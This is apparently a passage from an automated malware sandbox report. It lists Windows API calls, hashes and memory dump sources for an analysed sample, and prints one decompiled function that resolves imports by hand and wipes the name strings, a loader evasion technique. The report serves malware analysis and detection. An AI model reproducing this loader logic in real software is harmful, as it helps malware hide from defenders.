  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
